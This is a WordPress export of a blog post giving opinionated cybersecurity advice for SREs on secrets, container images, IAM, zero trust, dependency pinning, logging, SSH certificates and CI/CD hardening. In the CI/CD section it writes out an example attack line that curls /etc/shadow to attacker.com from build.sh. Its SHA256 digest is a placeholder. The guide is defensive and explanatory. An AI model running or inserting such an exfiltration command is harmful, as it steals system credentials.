{"id":4783,"date":"2026-05-08T21:51:58","date_gmt":"2026-05-08T16:21:58","guid":{"rendered":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/"},"modified":"2026-05-08T21:51:58","modified_gmt":"2026-05-08T16:21:58","slug":"10-essential-cybersecurity-best-practices-to-stay-safe-5","status":"publish","type":"post","link":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/","title":{"rendered":"10 Essential Cybersecurity Best Practices to Stay Safe"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_80 counter-hierarchy ez-toc-counter ez-toc-grey ez-toc-container-direction\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Table of Contents<\/p>\n<label for=\"ez-toc-cssicon-toggle-item-6a0399ed501ec\" class=\"ez-toc-cssicon-toggle-label\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/label><input type=\"checkbox\"  id=\"ez-toc-cssicon-toggle-item-6a0399ed501ec\"  aria-label=\"Toggle\" \/><nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#Your_Security_Checklist_is_a_Liability_Real-World_Cybersecurity_Best_Practices_for_the_Cynical_SRE\" >Your Security Checklist is a Liability: Real-World Cybersecurity Best Practices for the Cynical SRE<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#The_Environment_Variable_Trap\" >The Environment Variable Trap<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#The_Alpine_Linux_Myth\" >The Alpine Linux Myth<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#IAM_The_%E2%80%9CAction_%E2%80%9D_Sin\" >IAM: The &#8220;Action: *&#8221; Sin<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#The_False_Security_of_the_VPN\" >The False Security of the VPN<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#Dependency_Hell_and_the_%E2%80%9CAudit%E2%80%9D_Lie\" >Dependency Hell and the &#8220;Audit&#8221; Lie<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#Logging_The_Log4j_Lesson\" >Logging: The Log4j Lesson<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#The_SSH_Key_Management_Nightmare\" >The SSH Key Management Nightmare<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#The_%E2%80%9CBreak_Glass%E2%80%9D_Procedure\" >The &#8220;Break Glass&#8221; Procedure<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-10\" href=\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#The_CICD_Pipeline_Your_Biggest_Vulnerability\" >The CI\/CD Pipeline: Your Biggest Vulnerability<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-11\" href=\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#The_Reality_of_%E2%80%9CCybersecurity_Best%E2%80%9D\" >The Reality of &#8220;Cybersecurity Best&#8221;<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-12\" href=\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#Related_Articles\" >Related Articles<\/a><\/li><\/ul><\/nav><\/div>\n<h2><span class=\"ez-toc-section\" id=\"Your_Security_Checklist_is_a_Liability_Real-World_Cybersecurity_Best_Practices_for_the_Cynical_SRE\"><\/span>Your Security Checklist is a Liability: Real-World Cybersecurity Best Practices for the Cynical SRE<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>I once took down an entire payment gateway because I thought I was being clever with secret rotation. It was 3:00 AM. I had scripted a rolling update for our production Vault cluster, but I forgot to account for the token TTL on our legacy sidecars. When the old tokens expired, the sidecars couldn&#8217;t re-authenticate because the new Vault nodes were still in a <code>sealed<\/code> state, waiting for manual unseal keys that were stored in a &#8220;secure&#8221; physical safe three miles away from my home office. The site stayed dark for four hours while I drove through a thunderstorm to get a piece of paper with a hex string on it. <\/p>\n<p>That is the reality of &#8220;cybersecurity best&#8221; practices. They look great on a SOC2 compliance spreadsheet, but they fail spectacularly when they meet the friction of real-world infrastructure. We spend millions on &#8220;Next-Gen AI-Driven Threat Detection&#8221; but then we leave a <code>.git<\/code> directory in a public S3 bucket or hardcode a <code>STRIPE_LIVE_KEY<\/code> in a Dockerfile because &#8220;it&#8217;s just for the staging build.&#8221; If you&#8217;re looking for a list of tools to buy, close this tab. If you want to know how to stop your infrastructure from becoming a headline, let&#8217;s talk about the trade-offs that actually matter.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"The_Environment_Variable_Trap\"><\/span>The Environment Variable Trap<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Most &#8220;cybersecurity best&#8221; guides tell you to store secrets in environment variables. This is lazy advice. Environment variables are essentially public knowledge once someone gets a shell on your container. Anyone who can run <code>ps aux<\/code> or <code>cat \/proc\/1\/environ<\/code> can see your database credentials. If you use a crash reporting tool like Sentry or Datadog, and your app throws an unhandled exception, there is a non-zero chance your entire environment block is being shipped to a third-party SaaS platform in a stack trace.<\/p>\n<p>Stop doing this. Use a filesystem-based secret injection. If you are on Kubernetes, use the Secrets Store CSI Driver. It mounts secrets as files in a <code>tmpfs<\/code> volume. When the pod dies, the secrets vanish from memory. They aren&#8217;t persisted to disk, and they aren&#8217;t sitting in the process environment block for every child process to inherit.<\/p>\n<pre><code>\n# This is what a real SecretProviderClass looks like. \n# Don't use the 'secretObjects' sync unless you absolutely need \n# to support legacy apps that can't read from a file.\napiVersion: secrets-store.csi.x-k8s.io\/v1\nkind: SecretProviderClass\nmetadata:\n  name: api-secrets-vault\nspec:\n  provider: vault\n  parameters:\n    vaultAddress: \"https:\/\/vault.internal.production:8200\"\n    roleName: \"api-service-role\"\n    objects: |\n      - objectName: \"db-password\"\n        secretPath: \"secret\/data\/production\/api\"\n        secretKey: \"password\"\n      - objectName: \"api-key\"\n        secretPath: \"secret\/data\/production\/api\"\n        secretKey: \"key\"\n<\/code><\/pre>\n<p>Pro-tip: If you must use environment variables for legacy reasons, at least use a wrapper that clears them after the process starts. But honestly? Just fix the app to read from <code>\/var\/run\/secrets\/<\/code>. It takes ten minutes of coding and saves you a week of incident response.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"The_Alpine_Linux_Myth\"><\/span>The Alpine Linux Myth<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>The industry has a strange obsession with Alpine Linux for Docker images. &#8220;It&#8217;s small!&#8221; they say. &#8220;The attack surface is tiny!&#8221; they claim. Here is what they don&#8217;t tell you: Alpine uses <code>musl<\/code> instead of <code>glibc<\/code>. I have lost count of the number of times I&#8217;ve seen mysterious performance degradation or DNS resolution bugs because a Python or Node.js library expected <code>glibc<\/code> behavior and got <code>musl<\/code> instead. <\/p>\n<p>From a security perspective, Alpine is also a pain. Because it&#8217;s so minimal, the moment you need to debug something in production, you realize you don&#8217;t even have <code>curl<\/code> or <code>dig<\/code>. So what do developers do? They add <code>apk add --no-cache curl bind-tools<\/code> to the Dockerfile. Now you&#8217;ve just manually rebuilt a larger attack surface, but with the added bonus of potential binary incompatibilities.<\/p>\n<p>Use <code>debian-slim<\/code> or, better yet, Google&#8217;s <code>distroless<\/code> images. Distroless contains only your application and its runtime dependencies. No shell. No package manager. No <code>ls<\/code>. If an attacker gets an RCE (Remote Code Execution) in a distroless container, they can&#8217;t even <code>cd<\/code> into a directory to look around. They have to bring their own toolset, which is a much higher bar to clear.<\/p>\n<ul>\n<li>Distroless images reduce the number of &#8220;Critical&#8221; and &#8220;High&#8221; vulnerabilities in your Snyk\/Trivy scans by about 80% compared to standard Ubuntu images.<\/li>\n<li>You avoid the <code>LD_PRELOAD<\/code> trickery that attackers use to hijack library calls.<\/li>\n<li>Your CI\/CD pipeline runs faster because you aren&#8217;t pulling 200MB of bloated OS layers.<\/li>\n<li>Debugging is harder, yes. Use <code>kubectl debug<\/code> with an ephemeral container instead of baking tools into your production image.<\/li>\n<\/ul>\n<h2><span class=\"ez-toc-section\" id=\"IAM_The_%E2%80%9CAction_%E2%80%9D_Sin\"><\/span>IAM: The &#8220;Action: *&#8221; Sin<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Identity and Access Management (IAM) is where security goes to die. I&#8217;ve audited &#8220;secure&#8221; AWS environments where the <code>S3-Read-Only<\/code> policy was attached to a role that also had <code>iam:PassRole<\/code> permissions. Congratulations, you just gave that user administrative access to the entire account via an EC2 instance profile escalation.<\/p>\n<p>The &#8220;cybersecurity best&#8221; approach to IAM is not just &#8220;Least Privilege.&#8221; It&#8217;s &#8220;Least Privilege with Conditions.&#8221; If you have a Lambda function that needs to write to an S3 bucket, don&#8217;t just give it <code>s3:PutObject<\/code> on <code>arn:aws:s3:::my-bucket\/*<\/code>. Use conditions to restrict the IP address, the encryption status, and even the time of day if you&#8217;re feeling spicy.<\/p>\n<pre><code>\n{\n    \"Version\": \"2012-10-17\",\n    \"Statement\": [\n        {\n            \"Sid\": \"AllowPutObjectOnlyWithEncryption\",\n            \"Effect\": \"Allow\",\n            \"Action\": \"s3:PutObject\",\n            \"Resource\": \"arn:aws:s3:::customer-data-uploads-prod\/*\",\n            \"Condition\": {\n                \"StringEquals\": {\n                    \"s3:x-amz-server-side-encryption\": \"aws:kms\"\n                },\n                \"ArnEquals\": {\n                    \"aws:PrincipalArn\": \"arn:aws:iam::123456789012:role\/api-worker-role\"\n                }\n            }\n        }\n    ]\n}\n<\/code><\/pre>\n<p>Note to self: Always check for <code>iam:CreateAccessKey<\/code> permissions. I once saw a developer create a &#8220;service account&#8221; user for a CI\/CD pipeline and give it this permission so it could &#8220;manage its own keys.&#8221; An attacker compromised the CI\/CD, generated 500 access keys, and used them to bypass rate limits while exfiltrating the entire database. <\/p>\n<h2><span class=\"ez-toc-section\" id=\"The_False_Security_of_the_VPN\"><\/span>The False Security of the VPN<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>If your security strategy relies on &#8220;being on the VPN,&#8221; you are living in 2005. VPNs are a single point of failure. Once an attacker phishes a single employee and gets their VPN credentials (and bypasses the often-flimsy MFA), they are &#8220;inside&#8221; the network. From there, it&#8217;s a lateral movement playground. <\/p>\n<p>The &#8220;cybersecurity best&#8221; move is to move toward a Zero Trust architecture. Use something like Tailscale or Cloudflare Access. Every single request to an internal tool\u2014whether it&#8217;s your Jenkins instance or a staging DB\u2014should be authenticated and authorized at the application layer, not just the network layer. <\/p>\n<p>I&#8217;ve seen companies spend $50k on a hardware firewall while their internal Jira instance was running a version from 2018 with a known RCE. Because it was &#8220;behind the VPN,&#8221; they didn&#8217;t think it was a priority. Then a contractor&#8217;s laptop got infected with Emotet, and suddenly the &#8220;secure&#8221; internal network was a botnet node. <\/p>\n<p>Stop trusting the network. Start trusting the identity. Every internal service should require an OIDC (OpenID Connect) token. No exceptions. If your internal tool doesn&#8217;t support OIDC, put an <code>oauth2-proxy<\/code> in front of it. It&#8217;s a 5MB Go binary that saves you from a multi-million dollar breach.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Dependency_Hell_and_the_%E2%80%9CAudit%E2%80%9D_Lie\"><\/span>Dependency Hell and the &#8220;Audit&#8221; Lie<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Running <code>npm audit<\/code> is not a security strategy. It&#8217;s a way to generate noise that developers eventually learn to ignore. Most of the &#8220;vulnerabilities&#8221; reported by these tools are &#8220;Moderate&#8221; ReDoS (Regular Expression Denial of Service) bugs in build-time dependencies that will never see a single byte of production traffic. <\/p>\n<p>You need to prioritize. Focus on the supply chain. If you are pulling <code>latest<\/code> for any dependency, you are asking for a bad time. Pin your versions. Pin your hashes. <\/p>\n<pre><code>\n# Bad: You have no idea what version of the base image you're getting tomorrow\nFROM node:18\n\n# Better: You've pinned the version, but the tag can still be overwritten\nFROM node:18.16.0-slim\n\n# Best: You've pinned the SHA256 digest. This is immutable.\nFROM node:18.16.0-slim@sha256:e363026139158913989369836913691369136913691369136913691369136913\n<\/code><\/pre>\n<p>The same applies to your application code. Use <code>package-lock.json<\/code>, <code>go.sum<\/code>, or <code>requirements.txt<\/code> with hashes. I remember the <code>ua-parser-js<\/code> hijack in 2021. People who were pinning versions but not hashes still got hit because the attacker published a malicious version under an existing version number (though rare, it happens) or users were using ranges like <code>^0.7.28<\/code>. <\/p>\n<p>Pro-tip: Use a tool like Renovate or Dependabot, but configure it to only auto-merge &#8220;Patch&#8221; updates for non-critical libraries. For anything else, you need a human to look at the changelog. Yes, it&#8217;s slow. Yes, it&#8217;s &#8220;friction.&#8221; That&#8217;s the point.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Logging_The_Log4j_Lesson\"><\/span>Logging: The Log4j Lesson<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>We all remember December 2021. The world burned because a logging library was too powerful for its own good. But the real lesson of Log4j wasn&#8217;t &#8220;update your jars.&#8221; It was &#8220;don&#8217;t log what you don&#8217;t control.&#8221; <\/p>\n<p>I&#8217;ve seen SREs log the entire <code>User-Agent<\/code> string, the <code>X-Forwarded-For<\/code> header, and the full request body of every 400-level error. This is a goldmine for attackers. If I can inject a payload into a header that you then log, I can potentially trigger a vulnerability in your logging pipeline\u2014whether it&#8217;s Log4j, an Elasticsearch injection, or a buffer overflow in a legacy syslog-ng parser.<\/p>\n<p>Sanitize your logs. Use a structured logging library (like <code>zap<\/code> in Go or <code>structlog<\/code> in Python) and explicitly define the fields you want to capture. Never, ever log PII (Personally Identifiable Information). I once had to spend a weekend scrubbing 40TB of S3 logs because a junior dev decided to log the <code>auth_payload<\/code> which contained raw credit card numbers in plain text. <\/p>\n<pre><code>\n{\n  \"level\": \"error\",\n  \"ts\": 1625097600.123,\n  \"caller\": \"api\/handler.go:42\",\n  \"msg\": \"failed to process payment\",\n  \"request_id\": \"req_9a8b7c6d\",\n  \"user_id\": \"user_12345\",\n  \"error\": \"invalid expiry date\",\n  \"stacktrace\": \"...\" \n}\n<\/code><\/pre>\n<p>Note that we log the <code>user_id<\/code> and <code>request_id<\/code>, but not the <code>card_number<\/code> or the <code>cvv<\/code>. This seems obvious, but when you&#8217;re 12 hours into a production outage, &#8220;log everything&#8221; becomes a very tempting (and dangerous) mantra.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"The_SSH_Key_Management_Nightmare\"><\/span>The SSH Key Management Nightmare<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>If you are still manually adding <code>id_rsa.pub<\/code> strings to <code>authorized_keys<\/code> files, you are operating a ticking time bomb. People leave companies. People lose laptops. People &#8220;borrow&#8221; keys from coworkers. <\/p>\n<p>The &#8220;cybersecurity best&#8221; practice here is to stop using static SSH keys entirely. Use SSH Certificates. Netflix&#8217;s <code>BLESS<\/code> or HashiCorp Vault&#8217;s SSH secrets engine are the gold standard. A user authenticates with their SSO (Okta, Google, etc.), and in exchange, they get a short-lived (e.g., 1 hour) SSH certificate signed by your internal CA. <\/p>\n<p>If a laptop is stolen, the key is already expired. If an employee is fired, their SSO access is revoked, and they can no longer request new certificates. No more <code>authorized_keys<\/code> cleanup scripts that inevitably miss one server and leave a backdoor open for years.<\/p>\n<p>If you can&#8217;t do certificates yet, at least use <code>ProxyJump<\/code> through a bastion host that has mandatory MFA. And for the love of all that is holy, disable password authentication in <code>\/etc\/ssh\/sshd_config<\/code>:<\/p>\n<pre><code>\n# \/etc\/ssh\/sshd_config\nPasswordAuthentication no\nPubkeyAuthentication yes\nPermitRootLogin no\nMaxAuthTries 3\nAllowAgentForwarding no\nX11Forwarding no\n<\/code><\/pre>\n<h2><span class=\"ez-toc-section\" id=\"The_%E2%80%9CBreak_Glass%E2%80%9D_Procedure\"><\/span>The &#8220;Break Glass&#8221; Procedure<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Security is often at odds with availability. If you lock down your production environment so tightly that no one can access it, what happens when the database is deadlocking and the automated scripts are failing? <\/p>\n<p>You need a &#8220;Break Glass&#8221; procedure. This is a documented, tested way to gain emergency administrative access. It should involve:<\/p>\n<ul>\n<li>A physical or digital &#8220;vault&#8221; (like a 1Password for Teams vault) that requires multiple people to approve access.<\/li>\n<li>Immediate, high-priority alerting (PagerDuty, Slack, Email) the moment those credentials are used.<\/li>\n<li>A mandatory post-mortem every time the &#8220;Break Glass&#8221; is used to figure out why the standard, automated tools weren&#8217;t enough.<\/li>\n<li>Automatic rotation of the credentials immediately after the incident is resolved.<\/li>\n<li>Hardened logging that cannot be deleted by the &#8220;Break Glass&#8221; user (e.g., streaming logs to a separate, write-only AWS account).<\/li>\n<li>A clear definition of what constitutes an &#8220;emergency.&#8221;<\/li>\n<\/ul>\n<p>Without a Break Glass procedure, your SREs will find &#8220;creative&#8221; ways to bypass security controls when the pressure is on. And &#8220;creative&#8221; is just another word for &#8220;vulnerable.&#8221;<\/p>\n<h2><span class=\"ez-toc-section\" id=\"The_CICD_Pipeline_Your_Biggest_Vulnerability\"><\/span>The CI\/CD Pipeline: Your Biggest Vulnerability<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>We spend so much time hardening production, but we treat our CI\/CD pipelines like a playground. Your CI\/CD system (GitHub Actions, GitLab CI, Jenkins) has the keys to the kingdom. It can deploy code, it can modify infrastructure, and it often has access to your most sensitive secrets. <\/p>\n<p>If I&#8217;m an attacker, I&#8217;m not going to try to exploit your hardened Kubernetes cluster. I&#8217;m going to submit a PR to a random internal repo that adds a <code>curl -X POST -d @\/etc\/shadow attacker.com<\/code> line to your <code>build.sh<\/code>. If your CI\/CD isn&#8217;t configured to require approval for PRs from forks, or if it runs on every commit without oversight, I&#8217;m in.<\/p>\n<p>Cybersecurity best practices for CI\/CD:<\/p>\n<ol>\n<li><strong>OIDC for Cloud Access:<\/strong> Stop storing AWS Access Keys in GitHub Secrets. Use OIDC to get temporary credentials.<\/li>\n<li><strong>Isolated Runners:<\/strong> Don&#8217;t share runners between projects. A compromised build in a &#8220;test&#8221; project shouldn&#8217;t be able to steal secrets from a &#8220;production&#8221; project.<\/li>\n<li><strong>Immutable Build Artifacts:<\/strong> Build your image once, sign it (using Cosign\/Sigstore), and promote that exact image through your environments. Never rebuild the same code for staging and production.<\/li>\n<li><strong>Network Isolation:<\/strong> Your CI runners should not have unrestricted outbound internet access. They need to talk to your package registry and your cloud provider&#8217;s API. That&#8217;s it.<\/li>\n<\/ol>\n<p>I once saw a Jenkins server that had been &#8220;temporarily&#8221; given <code>AdministratorAccess<\/code> in AWS so it could debug a Terraform issue. It stayed that way for six months. When a plugin with a known vulnerability was exploited, the attacker didn&#8217;t just get the Jenkins server; they got the entire AWS organization. They started spinning up <code>p3.16xlarge<\/code> instances for crypto mining, and the company didn&#8217;t notice until the $40,000 bill arrived at the end of the month.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"The_Reality_of_%E2%80%9CCybersecurity_Best%E2%80%9D\"><\/span>The Reality of &#8220;Cybersecurity Best&#8221;<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>The truth is that &#8220;cybersecurity best&#8221; isn&#8217;t about a specific tool or a specific configuration. It&#8217;s about reducing the &#8220;Blast Radius.&#8221; You have to assume that every component of your system will be compromised at some point. The process, the container, the node, the network, the developer&#8217;s laptop\u2014they are all fallible. <\/p>\n<p>Your job as an SRE isn&#8217;t to build a wall that can&#8217;t be breached. It&#8217;s to build a system where a breach in one area doesn&#8217;t lead to a total collapse. This means defense in depth. It means mTLS between services. It means granular IAM roles. It means not being afraid to say &#8220;no&#8221; to a developer who wants to run their container as <code>root<\/code> because they&#8217;re too lazy to fix a permission issue in their <code>\/app\/data<\/code> folder.<\/p>\n<p>Stop chasing the hype. Stop buying the &#8220;AI-powered&#8221; blinky-light boxes. Fix your secrets, harden your images, and for the love of God, rotate your keys. Security is a boring, repetitive, and often thankless job. But it&#8217;s a lot better than being the person who has to explain to the board why the company&#8217;s entire database is for sale on a Telegram channel for $500 in Monero.<\/p>\n<p>If you can&#8217;t explain the technical trade-off of a security decision, you aren&#8217;t practicing security; you&#8217;re practicing superstition.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Related_Articles\"><\/span>Related Articles<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Explore more insights and best practices:<\/p>\n<ul>\n<li><a href=\"https:\/\/itsupportwale.com\/blog\/master-the-python-list-a-complete-guide-with-examples\/\">Master The Python List A Complete Guide With Examples<\/a><\/li>\n<li><a href=\"https:\/\/itsupportwale.com\/blog\/what-is-devops-definition-benefits-and-best-practices\/\">What Is Devops Definition Benefits And Best Practices<\/a><\/li>\n<li><a href=\"https:\/\/itsupportwale.com\/blog\/master-docker-compose-a-guide-to-multi-container-apps\/\">Master Docker Compose A Guide To Multi Container Apps<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Your Security Checklist is a Liability: Real-World Cybersecurity Best Practices for the Cynical SRE I once took down an entire payment gateway because I thought I was being clever with secret rotation. It was 3:00 AM. I had scripted a rolling update for our production Vault cluster, but I forgot to account for the token &#8230; <a title=\"10 Essential Cybersecurity Best Practices to Stay Safe\" class=\"read-more\" href=\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/\" aria-label=\"Read more  on 10 Essential Cybersecurity Best Practices to Stay Safe\">Read more<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-4783","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>10 Essential Cybersecurity Best Practices to Stay Safe - ITSupportWale<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"10 Essential Cybersecurity Best Practices to Stay Safe - ITSupportWale\" \/>\n<meta property=\"og:description\" content=\"Your Security Checklist is a Liability: Real-World Cybersecurity Best Practices for the Cynical SRE I once took down an entire payment gateway because I thought I was being clever with secret rotation. It was 3:00 AM. I had scripted a rolling update for our production Vault cluster, but I forgot to account for the token ... Read more\" \/>\n<meta property=\"og:url\" content=\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/\" \/>\n<meta property=\"og:site_name\" content=\"ITSupportWale\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Itsupportwale-298547177495978\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-08T16:21:58+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/itsupportwale.com\/blog\/wp-content\/uploads\/2021\/05\/android-chrome-512x512-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"512\" \/>\n\t<meta property=\"og:image:height\" content=\"512\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Techie\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Techie\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"13 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/\"},\"author\":{\"name\":\"Techie\",\"@id\":\"https:\/\/itsupportwale.com\/blog\/#\/schema\/person\/8c5a2b3d36396e0a8fd91ec8242fd46d\"},\"headline\":\"10 Essential Cybersecurity Best Practices to Stay Safe\",\"datePublished\":\"2026-05-08T16:21:58+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/\"},\"wordCount\":2329,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/itsupportwale.com\/blog\/#organization\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/\",\"url\":\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/\",\"name\":\"10 Essential Cybersecurity Best Practices to Stay Safe - ITSupportWale\",\"isPartOf\":{\"@id\":\"https:\/\/itsupportwale.com\/blog\/#website\"},\"datePublished\":\"2026-05-08T16:21:58+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/itsupportwale.com\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"10 Essential Cybersecurity Best Practices to Stay Safe\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/itsupportwale.com\/blog\/#website\",\"url\":\"https:\/\/itsupportwale.com\/blog\/\",\"name\":\"ITSupportWale\",\"description\":\"Tips, Tricks, Fixed-Errors, Tutorials &amp; 